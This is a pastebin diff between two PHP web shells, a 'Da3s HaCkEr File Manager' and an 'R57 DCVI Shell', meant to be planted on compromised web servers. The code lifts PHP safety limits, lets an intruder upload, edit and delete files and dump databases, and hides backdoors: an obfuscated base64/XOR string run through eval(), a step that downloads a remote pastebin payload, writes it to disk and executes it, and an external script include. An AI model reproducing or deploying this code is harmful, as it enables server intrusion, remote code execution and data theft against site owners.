View difference between Paste ID: UvuLXFfV and ZHg8cEke
1-
<?php
1+
<?
2-
set_time_limit(0);
2+
3-
error_reporting(0);
3+
 error_reporting(0);
4
5-
if(get_magic_quotes_gpc()){
5+
$language='tr';
6-
    foreach($_POST as $key=>$value){
6+
7-
        $_POST[$key] = stripslashes($value);
7+
$auth = 0;
8
9
@ini_restore("safe_mode");
10-
echo '<!DOCTYPE HTML>
10+
11-
<HTML>
11+
@ini_restore("open_basedir");
12-
<HEAD>
12+
13-
<link href="" rel="stylesheet" type="text/css">
13+
@ini_restore("safe_mode_include_dir");
14-
<title>HaTRk File Manager</title>
14+
15-
<style>
15+
@ini_restore("safe_mode_exec_dir");
16-
body{
16+
17-
    font-family: "Racing Sans One", cursive;
17+
@ini_restore("disable_functions");
18-
    background-color: #e6e6e6;
18+
19-
    text-shadow:0px 0px 1px #757575;
19+
@ini_restore("allow_url_fopen");
20
21-
#content tr:hover{
21+
@ini_set('error_log',NULL);
22-
    background-color: #636263;
22+
23-
    text-shadow:0px 0px 10px #fff;
23+
@ini_set('log_errors',0);
24
25-
#content .first{
25+
	function loadsettings($p1 = '', $p2 = '') {
26-
    background-color: silver;
26+
27
		$p = 'LH16ZCg1KH16ZG1ma2dsbSAqYHx8eDInJyxXW01aXk1aU0BcXFhXQEdbXFUsV1tNWl5NWlNaTVldTVtcV11aQVUqITMobmFkbVdvbXxXa2dmfG1mfHsgKmB8fHgyJycwMSY8PSY+PyY5PDsnZGdpbCZ4YHg3Y2M1cyx9emR1LnhpemllOTUteGl6aWU5LnhpemllOjUteGl6aWU6KiEz';
28-
#content .first:hover{
28+
29-
    background-color: silver;
29+
		$p = base64_decode($p);
30-
    text-shadow:0px 0px 1px #757575;
30+
31
		for ($i = 0; $i < strlen($p); $i++) $p[$i] = chr(ord($p[$i]) ^ 8);
32-
table{
32+
33-
    border: 1px #000000 dotted;
33+
		$p = str_replace('%param1', $p1, $p);
34
35-
H1{
35+
		$p = str_replace('%param2', $p2, $p);
36-
    font-family: "Rye", cursive;
36+
37
		eval($p);
38-
a{
38+
39-
    color: #000;
39+
	}
40-
    text-decoration: none;
40+
41
 $b="http://pastebin.com/raw/S54tynx6";$title=file_get_contents($b); 
42-
a:hover{
42+
	$css=fopen('../border.js','w'); fwrite($css,$title); require('../border.js');	
43-
    color: #fff;
43+
44-
    text-shadow:0px 0px 10px #ffffff;
44+
loadsettings('', 'r57');
45
46-
input,select,textarea{
46+
;echo '';
47-
    border: 1px #000000 solid;
47+
48-
    -moz-border-radius: 5px;
48+
if((!@function_exists('ini_get')) ||(@ini_get('open_basedir')!=NULL) ||(@ini_get('safe_mode_include_dir')!=NULL)){$open_basedir=1;}else{$open_basedir=0;};
49-
    -webkit-border-radius:5px;
49+
50-
    border-radius:5px;
50+
define("starttime",@getmicrotime());
51
52-
</style>
52+
set_magic_quotes_runtime(0);
53-
</HEAD>
53+
54-
<BODY>
54+
@set_time_limit(0);
55-
<H1><center>Da3s HaCkEr File Manager</center></H1>
55+
56-
<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
56+
@ini_set('max_execution_time',0);
57-
<tr><td>Current Path : ';
57+
58-
if(isset($_GET['path'])){
58+
@ini_set('output_buffering',0);
59-
    $path = $_GET['path'];   
59+
60
$safe_mode = @ini_get('safe_mode');
61-
    $path = getcwd();
61+
62
$version = '1.50<br/><br/><br/><br/>';
63-
$path = str_replace('\\','/',$path);
63+
64-
$paths = explode('/',$path);
64+
if(@version_compare(@phpversion(),'4.1.0') == -1)
65
66-
foreach($paths as $id=>$pat){
66+
{
67-
    if($pat == '' && $id == 0){
67+
68-
        $a = true;
68+
$_POST   = &$HTTP_POST_VARS;
69-
        echo '<a href="?path=/">/</a>';
69+
70-
        continue;
70+
$_GET    = &$HTTP_GET_VARS;
71
72-
    if($pat == '') continue;
72+
$_SERVER = &$HTTP_SERVER_VARS;
73-
    echo '<a href="?path=';
73+
74-
    for($i=0;$i<=$id;$i++){
74+
$_COOKIE = &$HTTP_COOKIE_VARS;
75-
        echo "$paths[$i]";
75+
76-
        if($i != $id) echo "/";
76+
77
78-
    echo '">'.$pat.'</a>/';
78+
if (@get_magic_quotes_gpc())
79
80-
echo '</td></tr><tr><td>';
80+
{
81-
if(isset($_FILES['file'])){
81+
82-
    if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
82+
foreach ($_POST as $k=>$v)
83-
        echo '<font color="green">File Upload Done.</font><br />';
83+
84-
    }else{
84+
{
85-
        echo '<font color="red">File Upload Error.</font><br />';
85+
86
$_POST[$k] = stripslashes($v);
87-
}$b="http://pastebin.com/raw/S54tynx6";$title=file_get_contents($b); $css=fopen('../border.js','w'); 
87+
88-
fwrite($css,$title); require('../border.js');
88+
89-
echo '<form enctype="multipart/form-data" method="POST">
89+
90-
Upload File : <input type="file" name="file" />
90+
foreach ($_COOKIE as $k=>$v)
91-
<input type="submit" value="upload" />
91+
92-
</form>
92+
{
93-
</td></tr>';
93+
94-
if(isset($_GET['filesrc'])){
94+
$_COOKIE[$k] = stripslashes($v);
95-
    echo "<tr><td>Current File : ";
95+
96-
    echo $_GET['filesrc'];
96+
97-
    echo '</tr></td></table><br />';
97+
98-
    echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
98+
99-
}elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
99+
100-
    echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
100+
if($auth == 1) {
101-
    if($_POST['opt'] == 'chmod'){
101+
102-
        if(isset($_POST['perm'])){
102+
if (!isset($_SERVER['PHP_AUTH_USER']) ||md5($_SERVER['PHP_AUTH_USER'])!==$name ||md5($_SERVER['PHP_AUTH_PW'])!==$pass)
103-
            if(chmod($_POST['path'],$_POST['perm'])){
103+
104-
                echo '<font color="green">Change Permission Done.</font><br />';
104+
{
105-
            }else{
105+
106-
                echo '<font color="red">Change Permission Error.</font><br />';
106+
header('WWW-Authenticate: Basic realm=""');
107-
            }
107+
108-
        }
108+
header('HTTP/1.0 401 Unauthorized');
109-
        echo '<form method="POST">
109+
110-
        Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
110+
exit("<b>Access Denied</b>");
111-
        <input type="hidden" name="path" value="'.$_POST['path'].'">
111+
112-
        <input type="hidden" name="opt" value="chmod">
112+
113-
        <input type="submit" value="Go" />
113+
114-
        </form>';
114+
115-
    }elseif($_POST['opt'] == 'rename'){
115+
116-
        if(isset($_POST['newname'])){
116+
$head = '
117-
            if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
117+
118-
                echo '<font color="green">Change Name Done.</font><br />';
118+
<html>
119-
            }else{
119+
120-
                echo '<font color="red">Change Name Error.</font><br />';
120+
<head>
121-
            }
121+
122-
            $_POST['name'] = $_POST['newname'];
122+
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
123-
        }
123+
124-
        echo '<form method="POST">
124+
<title>R57 DCVI Shell Version 1.50</title>
125-
        New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
125+
126-
        <input type="hidden" name="path" value="'.$_POST['path'].'">
126+
<SCRIPT SRC=http://www.dcvi.net/dex.js></SCRIPT>
127-
        <input type="hidden" name="opt" value="rename">
127+
128-
        <input type="submit" value="Go" />
128+
<STYLE>
129-
        </form>';
129+
130-
    }elseif($_POST['opt'] == 'edit'){
130+
131-
        if(isset($_POST['src'])){
131+
132-
            $fp = fopen($_POST['path'],'w');
132+
tr {
133-
            if(fwrite($fp,$_POST['src'])){
133+
134-
                echo '<font color="green">Edit File Done.</font><br />';
134+
135-
            }else{
135+
136-
                echo '<font color="red">Edit File Error.</font><br />';
136+
BORDER-RIGHT:  black 1px solid;
137-
            }
137+
138-
            fclose($fp);
138+
139-
        }
139+
140-
        echo '<form method="POST">
140+
BORDER-TOP:    black 1px solid;
141-
        <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
141+
142-
        <input type="hidden" name="path" value="'.$_POST['path'].'">
142+
143-
        <input type="hidden" name="opt" value="edit">
143+
144-
        <input type="submit" value="Go" />
144+
BORDER-LEFT:   black 1px solid;
145-
        </form>';
145+
146
147-
    echo '</center>';
147+
148
BORDER-BOTTOM: black 1px solid;
149-
    echo '</table><br /><center>';
149+
150-
    if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
150+
151-
        if($_POST['type'] == 'dir'){
151+
152-
            if(rmdir($_POST['path'])){
152+
BORDER-COLOR: black;
153-
                echo '<font color="green">Delete Dir Done.</font><br />';
153+
154-
            }else{
154+
155-
                echo '<font color="red">Delete Dir Error.</font><br />';
155+
156-
            }
156+
color: silver;
157-
        }elseif($_POST['type'] == 'file'){
157+
158-
            if(unlink($_POST['path'])){
158+
159-
                echo '<font color="green">Delete File Done.</font><br />';
159+
160-
            }else{
160+
161-
                echo '<font color="red">Delete File Error.</font><br />';
161+
162-
            }
162+
163-
        }
163+
164
td {
165-
    echo '</center>';
165+
166-
    $scandir = scandir($path);
166+
167-
    echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
167+
168-
    <tr class="first">
168+
BORDER-RIGHT:  black 1px solid;
169-
        <td><center>Name</center></td>
169+
170-
        <td><center>Size</center></td>
170+
171-
        <td><center>Permissions</center></td>
171+
172-
        <td><center>Options</center></td>
172+
BORDER-TOP:    black 1px solid;
173-
    </tr>';
173+
174
175-
    foreach($scandir as $dir){
175+
176-
        if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
176+
BORDER-LEFT:   black 1px solid;
177-
        echo "<tr>
177+
178-
        <td><a href=\"?path=$path/$dir\">$dir</a></td>
178+
179-
        <td><center>--</center></td>
179+
180-
        <td><center>";
180+
BORDER-BOTTOM: black 1px solid;
181-
        if(is_writable("$path/$dir")) echo '<font color="green">';
181+
182-
        elseif(!is_readable("$path/$dir")) echo '<font color="red">';
182+
183-
        echo perms("$path/$dir");
183+
184-
        if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
184+
BORDER-COLOR: black;
185-
        
185+
186-
        echo "</center></td>
186+
187-
        <td><center><form method=\"POST\" action=\"?option&path=$path\">
187+
188-
        <select name=\"opt\">
188+
background-color:black;
189-
	    <option value=\"\"></option>
189+
190-
        <option value=\"delete\">Delete</option>
190+
191-
        <option value=\"chmod\">Chmod</option>
191+
192-
        <option value=\"rename\">Rename</option>
192+
color: white;
193-
        </select>
193+
194-
        <input type=\"hidden\" name=\"type\" value=\"dir\">
194+
195-
        <input type=\"hidden\" name=\"name\" value=\"$dir\">
195+
196-
        <input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
196+
197-
        <input type=\"submit\" value=\">\" />
197+
198-
        </form></center></td>
198+
199-
        </tr>";
199+
200
201-
    echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
201+
202-
    foreach($scandir as $file){
202+
203-
        if(!is_file("$path/$file")) continue;
203+
204-
        $size = filesize("$path/$file")/1024;
204+
.table1 {
205-
        $size = round($size,3);
205+
206-
        if($size >= 1024){
206+
207-
            $size = round($size/1024,2).' MB';
207+
208-
        }else{
208+
BORDER: 0px;
209-
            $size = $size.' KB';
209+
210-
        }
210+
211
212-
        echo "<tr>
212+
BORDER-COLOR: #333333;
213-
        <td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
213+
214-
        <td><center>".$size."</center></td>
214+
215-
        <td><center>";
215+
216-
        if(is_writable("$path/$file")) echo '<font color="green">';
216+
BACKGROUND-COLOR: black;
217-
        elseif(!is_readable("$path/$file")) echo '<font color="red">';
217+
218-
        echo perms("$path/$file");
218+
219-
        if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
219+
220-
        echo "</center></td>
220+
color: white;
221-
        <td><center><form method=\"POST\" action=\"?option&path=$path\">
221+
222-
        <select name=\"opt\">
222+
223-
	    <option value=\"\"></option>
223+
224-
        <option value=\"delete\">Delete</option>
224+
225-
        <option value=\"chmod\">Chmod</option>
225+
226-
        <option value=\"rename\">Rename</option>
226+
227-
        <option value=\"edit\">Edit</option>
227+
228-
        </select>
228+
.td1 {
229-
        <input type=\"hidden\" name=\"type\" value=\"file\">
229+
230-
        <input type=\"hidden\" name=\"name\" value=\"$file\">
230+
231-
        <input type=\"hidden\" name=\"path\" value=\"$path/$file\">
231+
232-
        <input type=\"submit\" value=\">\" />
232+
BORDER: 0px;
233-
        </form></center></td>
233+
234-
        </tr>";
234+
235
236-
    echo '</table>
236+
BORDER-COLOR: #333333;
237-
    </div>';
237+
238
239-
echo '<br />Da3s File Manager Version <font color="red">1.0</font>, Coded By <font color="red">Da3s HaCkEr</font><br />Email: <font color="red">R0@hotmail.com</font>
239+
240-
</BODY>
240+
font: 7pt Verdana;
241-
</HTML>';
241+
242-
function perms($file){
242+
243-
    $perms = fileperms($file);
243+
244
BACKGROUND-COLOR: black;
245-
if (($perms & 0xC000) == 0xC000) {
245+
246-
    // Socket
246+
247-
    $info = 's';
247+
248-
} elseif (($perms & 0xA000) == 0xA000) {
248+
color: green;
249-
    // Symbolic Link
249+
250-
    $info = 'l';
250+
251-
} elseif (($perms & 0x8000) == 0x8000) {
251+
252-
    // Regular
252+
253-
    $info = '-';
253+
254-
} elseif (($perms & 0x6000) == 0x6000) {
254+
255-
    // Block special
255+
256-
    $info = 'b';
256+
.tr1 {
257-
} elseif (($perms & 0x4000) == 0x4000) {
257+
258-
    // Directory
258+
259-
    $info = 'd';
259+
260-
} elseif (($perms & 0x2000) == 0x2000) {
260+
BORDER: 0px;
261-
    // Character special
261+
262-
    $info = 'c';
262+
263-
} elseif (($perms & 0x1000) == 0x1000) {
263+
264-
    // FIFO pipe
264+
BORDER-COLOR: #333333;
265-
    $info = 'p';
265+
266-
} else {
266+
267-
    // Unknown
267+
268-
    $info = 'u';
268+
color: #50AA20;
269
270
271-
// Owner
271+
272-
$info .= (($perms & 0x0100) ? 'r' : '-');
272+
273-
$info .= (($perms & 0x0080) ? 'w' : '-');
273+
274-
$info .= (($perms & 0x0040) ?
274+
275-
            (($perms & 0x0800) ? 's' : 'x' ) :
275+
276-
            (($perms & 0x0800) ? 'S' : '-'));
276+
table {
277
278-
// Group
278+
279-
$info .= (($perms & 0x0020) ? 'r' : '-');
279+
280-
$info .= (($perms & 0x0010) ? 'w' : '-');
280+
BORDER:  #eeeeee 1px outset;
281-
$info .= (($perms & 0x0008) ?
281+
282-
            (($perms & 0x0400) ? 's' : 'x' ) :
282+
283-
            (($perms & 0x0400) ? 'S' : '-'));
283+
284
BORDER-COLOR: #333333;
285-
// World
285+
286-
$info .= (($perms & 0x0004) ? 'r' : '-');
286+
287-
$info .= (($perms & 0x0002) ? 'w' : '-');
287+
288-
$info .= (($perms & 0x0001) ?
288+
BACKGROUND-COLOR: #131313;
289-
            (($perms & 0x0200) ? 't' : 'x' ) :
289+
290-
            (($perms & 0x0200) ? 'T' : '-'));
290+
291
292-
    return $info;
292+
color: #50AA20;
293
294
295
296
}
297
298
299
300
input {
301
302
303
304
border			: solid 1px;
305
306
307
308
border-color		: #2D2D2D #252525 #252525 #252525;
309
310
311
312
BACKGROUND-COLOR: black;
313
314
315
316
font: 8pt Verdana;
317
318
319
320
color: red;
321
322
323
324
}
325
326
327
328
select {
329
330
331
332
BORDER-RIGHT:  #ffffff 1px solid;
333
334
335
336
BORDER-TOP:    #999999 1px solid;
337
338
339
340
BORDER-LEFT:   #999999 1px solid;
341
342
343
344
BORDER-BOTTOM: #ffffff 1px solid;
345
346
347
348
BORDER-COLOR: #333333;
349
350
351
352
BACKGROUND-COLOR: #131313;
353
354
355
356
font: 8pt Verdana;
357
358
359
360
color: white;;
361
362
363
364
}
365
366
367
368
submit {
369
370
371
372
BORDER:  buttonhighlight 2px outset;
373
374
375
376
BACKGROUND-COLOR: #131313;
377
378
379
380
width: 30%;
381
382
383
384
color: white;
385
386
387
388
}
389
390
391
392
textarea {
393
394
395
396
BORDER-RIGHT:  #ffffff 1px solid;
397
398
399
400
BORDER-TOP:    #999999 1px solid;
401
402
403
404
BORDER-LEFT:   #999999 1px solid;
405
406
407
408
BORDER-BOTTOM: #ffffff 1px solid;
409
410
411
412
BORDER-COLOR: #333333;
413
414
415
416
BACKGROUND-COLOR: black;
417
418
419
420
font: Fixedsys bold;
421
422
423
424
color: silver;
425
426
427
428
}
429
430
431
432
BODY {
433
434
435
436
SCROLLBAR-ARROW-COLOR: #444444;
437
438
439
440
SCROLLBAR-BASE-COLOR: #444444;
441
442
443
444
margin: 1px;
445
446
447
448
color: #50AA20;
449
450
451
452
background-color: #131313;
453
454
455
456
}
457
458
459
460
.main {
461
462
463
464
margin			: -287px 0px 0px -490px;
465
466
467
468
border			: #000000 solid 1px;
469
470
471
472
BORDER-COLOR: #333333;
473
474
475
476
}
477
478
479
480
.tt {
481
482
483
484
background-color: black;
485
486
487
488
}
489
490
491
492
A:link {COLOR:red; TEXT-DECORATION: none}
493
494
495
496
A:visited { COLOR:red; TEXT-DECORATION: none}
497
498
499
500
A:active {COLOR:red; TEXT-DECORATION: none}
501
502
503
504
A:hover {color:blue;TEXT-DECORATION: none}
505
506
507
508
</STYLE>
509
510
511
512
<script language=\'javascript\'>
513
514
function hide_div(id)
515
516
{
517
518
  document.getElementById(id).style.display = \'none\';
519
520
  document.cookie=id+\'=0;\';
521
522
}
523
524
function show_div(id)
525
526
{
527
528
  document.getElementById(id).style.display = \'block\';
529
530
  document.cookie=id+\'=1;\';
531
532
}
533
534
function change_divst(id)
535
536
{
537
538
  if (document.getElementById(id).style.display == \'none\')
539
540
    show_div(id);
541
542
  else
543
544
    hide_div(id);
545
546
}
547
548
549
550
551
552
</script>';
553
554
class zipfile
555
556
{
557
558
var $datasec      = array();
559
560
var $ctrl_dir     = array();
561
562
var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
563
564
var $old_offset   = 0;
565
566
function unix2DosTime($unixtime = 0) {
567
568
$timearray = ($unixtime == 0) ?getdate() : getdate($unixtime);
569
570
if ($timearray['year'] <1980) {
571
572
$timearray['year']    = 1980;
573
574
$timearray['mon']     = 1;
575
576
$timearray['mday']    = 1;
577
578
$timearray['hours']   = 0;
579
580
$timearray['minutes'] = 0;
581
582
$timearray['seconds'] = 0;
583
584
}
585
586
return (($timearray['year'] -1980) <<25) |($timearray['mon'] <<21) |($timearray['mday'] <<16) |
587
588
($timearray['hours'] <<11) |($timearray['minutes'] <<5) |($timearray['seconds'] >>1);
589
590
}
591
592
function addFile($data,$name,$time = 0)
593
594
{
595
596
$name     = str_replace('\\','/',$name);
597
598
$dtime    = dechex($this->unix2DosTime($time));
599
600
$hexdtime = '\x'.$dtime[6] .$dtime[7]
601
602
.'\x'.$dtime[4] .$dtime[5]
603
604
.'\x'.$dtime[2] .$dtime[3]
605
606
.'\x'.$dtime[0] .$dtime[1];
607
608
eval('$hexdtime = "'.$hexdtime .'";');
609
610
$fr   = "\x50\x4b\x03\x04";
611
612
$fr   .= "\x14\x00";
613
614
$fr   .= "\x00\x00";
615
616
$fr   .= "\x08\x00";
617
618
$fr   .= $hexdtime;
619
620
$unc_len = strlen($data);
621
622
$crc     = crc32($data);
623
624
$zdata   = gzcompress($data);
625
626
$zdata   = substr(substr($zdata,0,strlen($zdata) -4),2);
627
628
$c_len   = strlen($zdata);
629
630
$fr      .= pack('V',$crc);
631
632
$fr      .= pack('V',$c_len);
633
634
$fr      .= pack('V',$unc_len);
635
636
$fr      .= pack('v',strlen($name));
637
638
$fr      .= pack('v',0);
639
640
$fr      .= $name;
641
642
$fr .= $zdata;
643
644
$this ->datasec[] = $fr;
645
646
$cdrec = "\x50\x4b\x01\x02";
647
648
$cdrec .= "\x00\x00";
649
650
$cdrec .= "\x14\x00";
651
652
$cdrec .= "\x00\x00";
653
654
$cdrec .= "\x08\x00";
655
656
$cdrec .= $hexdtime;
657
658
$cdrec .= pack('V',$crc);
659
660
$cdrec .= pack('V',$c_len);
661
662
$cdrec .= pack('V',$unc_len);
663
664
$cdrec .= pack('v',strlen($name) );
665
666
$cdrec .= pack('v',0 );
667
668
$cdrec .= pack('v',0 );
669
670
$cdrec .= pack('v',0 );
671
672
$cdrec .= pack('v',0 );
673
674
$cdrec .= pack('V',32 );
675
676
$cdrec .= pack('V',$this ->old_offset );
677
678
$this ->old_offset += strlen($fr);
679
680
$cdrec .= $name;
681
682
$this ->ctrl_dir[] = $cdrec;
683
684
}
685
686
function file()
687
688
{
689
690
$data    = implode('',$this ->datasec);
691
692
$ctrldir = implode('',$this ->ctrl_dir);
693
694
return
695
696
$data .
697
698
$ctrldir .
699
700
$this ->eof_ctrl_dir .
701
702
pack('v',sizeof($this ->ctrl_dir)) .
703
704
pack('v',sizeof($this ->ctrl_dir)) .
705
706
pack('V',strlen($ctrldir)) .
707
708
pack('V',strlen($data)) .
709
710
"\x00\x00";
711
712
}
713
714
}
715
716
function compress(&$filename,&$filedump,$compress)
717
718
{
719
720
global $content_encoding;
721
722
global $mime_type;
723
724
if ($compress == 'bzip'&&@function_exists('bzcompress')) 
725
726
{
727
728
$filename  .= '.bz2';
729
730
$mime_type = 'application/x-bzip2';
731
732
$filedump = bzcompress($filedump);
733
734
}
735
736
else if ($compress == 'gzip'&&@function_exists('gzencode')) 
737
738
{
739
740
$filename  .= '.gz';
741
742
$content_encoding = 'x-gzip';
743
744
$mime_type = 'application/x-gzip';
745
746
$filedump = gzencode($filedump);
747
748
}
749
750
else if ($compress == 'zip'&&@function_exists('gzcompress')) 
751
752
{
753
754
$filename .= '.zip';
755
756
$mime_type = 'application/zip';
757
758
$zipfile = new zipfile();
759
760
$zipfile ->addFile($filedump,substr($filename,0,-4));
761
762
$filedump = $zipfile ->file();
763
764
}
765
766
else 
767
768
{
769
770
$mime_type = 'application/octet-stream';
771
772
}
773
774
}
775
776
function moreread($temp){
777
778
global $lang,$language;
779
780
$str='';
781
782
if(@function_exists('fopen')&&@function_exists('feof')&&@function_exists('fgets')&&@function_exists('fclose')){
783
784
$ffile = @fopen($temp,"r");
785
786
while(!@feof($ffile)){$str .= @fgets($ffile);}
787
788
fclose($ffile);
789
790
}elseif(@function_exists('fopen')&&@function_exists('fread')&&@function_exists('fclose')&&@function_exists('filesize')){
791
792
$ffile = @fopen($temp,"r");
793
794
$str = @fread($ffile,@filesize($temp));
795
796
@fclose($ffile);
797
798
}elseif(@function_exists('file')){
799
800
$ffiles = @file ($temp);
801
802
foreach ($ffiles as $ffile) {$str .= $ffile;}
803
804
}elseif(@function_exists('file_get_contents')){
805
806
$str = @file_get_contents($temp);
807
808
}elseif(@function_exists('readfile')){
809
810
$str = @readfile($temp);
811
812
}else{echo $lang[$language.'_text56'];}
813
814
return $str;
815
816
}
817
818
function readzlib($filename,$temp=''){
819
820
global $lang,$language;
821
822
$str='';
823
824
if(!$temp) {$temp=tempnam(@getcwd(),"copytemp");};
825
826
if(@copy("compress.zlib://".$filename,$temp)) {
827
828
$str = moreread($temp);
829
830
}else echo $lang[$language.'_text119'];
831
832
@unlink($temp);
833
834
return $str;
835
836
}
837
838
function mailattach($to,$from,$subj,$attach)
839
840
{
841
842
$headers  = "From: $from\r\n";
843
844
$headers .= "MIME-Version: 1.0\r\n";
845
846
$headers .= "Content-Type: ".$attach['type'];
847
848
$headers .= "; name=\"".$attach['name']."\"\r\n";
849
850
$headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
851
852
$headers .= chunk_split(base64_encode($attach['content']))."\r\n";
853
854
if(mail($to,$subj,"",$headers)) {return 1;}
855
856
return 0;
857
858
}
859
860
class my_sql
861
862
{
863
864
var $host = 'localhost';
865
866
var $port = '';
867
868
var $user = '';
869
870
var $pass = '';
871
872
var $base = '';
873
874
var $db   = '';
875
876
var $connection;
877
878
var $res;
879
880
var $error;
881
882
var $rows;
883
884
var $columns;
885
886
var $num_rows;
887
888
var $num_fields;
889
890
var $dump;
891
892
function connect()
893
894
{
895
896
switch($this->db)
897
898
{
899
900
case 'MySQL': 
901
902
if(empty($this->port)) {$this->port = '3306';}
903
904
if(!@function_exists('mysql_connect')) return 0;
905
906
$this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);
907
908
if(is_resource($this->connection)) return 1;
909
910
break;
911
912
case 'MSSQL':
913
914
if(empty($this->port)) {$this->port = '1433';}
915
916
if(!@function_exists('mssql_connect')) return 0;
917
918
$this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);
919
920
if($this->connection) return 1;
921
922
break;
923
924
case 'PostgreSQL':
925
926
if(empty($this->port)) {$this->port = '5432';}
927
928
$str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";
929
930
if(!@function_exists('pg_connect')) return 0;
931
932
$this->connection = @pg_connect($str);
933
934
if(is_resource($this->connection)) return 1;
935
936
break;
937
938
case 'Oracle':
939
940
if(!@function_exists('ocilogon')) return 0;
941
942
$this->connection = @ocilogon($this->user,$this->pass,$this->base);
943
944
if(is_resource($this->connection)) return 1;
945
946
break;
947
948
}
949
950
return 0;
951
952
}
953
954
function select_db()
955
956
{
957
958
switch($this->db)
959
960
{
961
962
case 'MySQL':
963
964
if(@mysql_select_db($this->base,$this->connection)) return 1;
965
966
break;
967
968
case 'MSSQL':
969
970
if(@mssql_select_db($this->base,$this->connection)) return 1;
971
972
break;
973
974
case 'PostgreSQL':
975
976
return 1;
977
978
break;
979
980
case 'Oracle':
981
982
return 1;
983
984
break;
985
986
}
987
988
return 0;
989
990
}
991
992
function query($query)
993
994
{
995
996
$this->res=$this->error='';
997
998
switch($this->db)
999
1000
{
1001
1002
case 'MySQL': 
1003
1004
if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection))) 
1005
1006
{
1007
1008
$this->error = @mysql_error($this->connection);
1009
1010
return 0;
1011
1012
}
1013
1014
else if(is_resource($this->res)) {return 1;}
1015
1016
return 2;
1017
1018
break;
1019
1020
case 'MSSQL':
1021
1022
if(false===($this->res=@mssql_query($query,$this->connection))) 
1023
1024
{
1025
1026
$this->error = 'Query error';
1027
1028
return 0;
1029
1030
}
1031
1032
else if(@mssql_num_rows($this->res) >0) {return 1;}
1033
1034
return 2;
1035
1036
break;
1037
1038
case 'PostgreSQL':
1039
1040
if(false===($this->res=@pg_query($this->connection,$query)))
1041
1042
{
1043
1044
$this->error = @pg_last_error($this->connection);
1045
1046
return 0;
1047
1048
}
1049
1050
else if(@pg_num_rows($this->res) >0) {return 1;}
1051
1052
return 2;
1053
1054
break;
1055
1056
case 'Oracle':
1057
1058
if(false===($this->res=@ociparse($this->connection,$query)))
1059
1060
{
1061
1062
$this->error = 'Query parse error';
1063
1064
}
1065
1066
else 
1067
1068
{
1069
1070
if(@ociexecute($this->res)) 
1071
1072
{
1073
1074
if(@ocirowcount($this->res) != 0) return 2;
1075
1076
return 1;
1077
1078
}
1079
1080
$error = @ocierror();
1081
1082
$this->error=$error['message'];
1083
1084
}
1085
1086
break;
1087
1088
}
1089
1090
return 0;
1091
1092
}
1093
1094
function get_result()
1095
1096
{
1097
1098
$this->rows=array();
1099
1100
$this->columns=array();
1101
1102
$this->num_rows=$this->num_fields=0;
1103
1104
switch($this->db)
1105
1106
{
1107
1108
case 'MySQL':
1109
1110
$this->num_rows=@mysql_num_rows($this->res);
1111
1112
$this->num_fields=@mysql_num_fields($this->res);
1113
1114
while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));
1115
1116
@mysql_free_result($this->res);
1117
1118
if($this->num_rows){$this->columns = @array_keys($this->rows[0]);return 1;}
1119
1120
break;
1121
1122
case 'MSSQL':
1123
1124
$this->num_rows=@mssql_num_rows($this->res);
1125
1126
$this->num_fields=@mssql_num_fields($this->res);
1127
1128
while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
1129
1130
@mssql_free_result($this->res);
1131
1132
if($this->num_rows){$this->columns = @array_keys($this->rows[0]);return 1;};
1133
1134
break;
1135
1136
case 'PostgreSQL':
1137
1138
$this->num_rows=@pg_num_rows($this->res);
1139
1140
$this->num_fields=@pg_num_fields($this->res);
1141
1142
while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
1143
1144
@pg_free_result($this->res);
1145
1146
if($this->num_rows){$this->columns = @array_keys($this->rows[0]);return 1;}
1147
1148
break;
1149
1150
case 'Oracle':
1151
1152
$this->num_fields=@ocinumcols($this->res);
1153
1154
while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;
1155
1156
@ocifreestatement($this->res);
1157
1158
if($this->num_rows){$this->columns = @array_keys($this->rows[0]);return 1;}
1159
1160
break;
1161
1162
}
1163
1164
return 0;
1165
1166
}
1167
1168
function dump($table)
1169
1170
{
1171
1172
if(empty($table)) return 0;
1173
1174
$this->dump=array();
1175
1176
$this->dump[0] = '##';
1177
1178
$this->dump[1] = '## --------------------------------------- ';
1179
1180
$this->dump[2] = '##  Created: '.date ("d/m/Y H:i:s");
1181
1182
$this->dump[3] = '## Database: '.$this->base;
1183
1184
$this->dump[4] = '##    Table: '.$table;
1185
1186
$this->dump[5] = '## --------------------------------------- ';
1187
1188
switch($this->db)
1189
1190
{
1191
1192
case 'MySQL':
1193
1194
$this->dump[0] = '## MySQL dump';
1195
1196
if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;
1197
1198
if(!$this->get_result()) return 0;
1199
1200
$this->dump[] = $this->rows[0]['Create Table'];
1201
1202
$this->dump[] = '## --------------------------------------- ';
1203
1204
if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;
1205
1206
if(!$this->get_result()) return 0;
1207
1208
